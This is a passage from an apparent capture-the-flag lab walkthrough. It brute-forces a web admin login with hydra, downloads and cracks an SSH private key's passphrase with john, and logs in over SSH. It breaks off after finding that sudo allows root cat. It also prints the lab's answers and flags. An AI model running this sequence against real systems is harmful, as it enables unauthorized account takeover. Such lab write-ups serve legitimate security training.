Now that we know the username, we can use hydra to brute force the password.
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.30.186 http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:F=username or password invalid"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-07 09:48:50
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.30.186:80/admin/index.php:user=^USER^&pass=^PASS^:F=username or password invalid
[80][http-post-form] host: 10.10.30.186 login: admin password: xavier
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-07 09:49:25
Answer
admin:xavier
Crack the RSA key you found.
What is John's RSA Private Key passphrase?>
Let's login with admin as the username and xavier as the password.
Let's download the RSA private key for the user john.
$ wget http://10.10.30.186/admin/panel/id_rsa
--2023-12-07 09:59:03-- http://10.10.30.186/admin/panel/id_rsa
Connecting to 10.10.30.186:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1766 (1.7K)
Saving to: ‘id_rsa’
id_rsa 100%[========================================================================================================================================>] 1.72K --.-KB/s in 0s
2023-12-07 09:59:04 (3.21 No error) - ‘id_rsa’ saved [1766/1766]
We can use ssh2john to create a hash file.
$ ssh2john id_rsa > id_hash
Now we can use john to crack the hashes.
$ john id_hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
rockinroll (id_rsa)
1g 0:00:00:00 DONE (2023-12-07 10:04) 4.000g/s 290496p/s 290496c/s 290496C/s romeo23..renatito
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Answer
rockinroll
user.txt
Let's change the permissions of the id_rsa file.
$ chmod 700 id_rsa
Now that we know that the password for john is rockinroll, let's login through SSH.
$ ssh -i id_rsa john@10.10.30.186
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-118-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Dec 7 04:40:36 UTC 2023
System load: 0.0 Processes: 102
Usage of /: 25.7% of 19.56GB Users logged in: 0
Memory usage: 36% IP address for eth0: 10.10.30.186
Swap usage: 0%
63 packages can be updated.
0 updates are security updates.
Last login: Wed Sep 30 14:06:18 2020 from 192.168.1.106
john@bruteit:~$
Let's read the user.txt file.
john@bruteit:~$ ls
user.txt
john@bruteit:~$ cat user.txt
THM{a_password_is_not_a_barrier}
Answer
THM{a_password_is_not_a_barrier}
Web flag
The web flag was present on the page with the RSA private key.
THM{brut3_f0rce_is_e4sy}
Task 4: Privilege Escalation
Find a form to escalate your privileges.
What is the root's password?
Let's check what sudo commands john has the permission to execute.
john@bruteit:~$ sudo -l
Matching Defaults entries for john on bruteit:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on bruteit:
(root) NOPASSWD: /bin/cat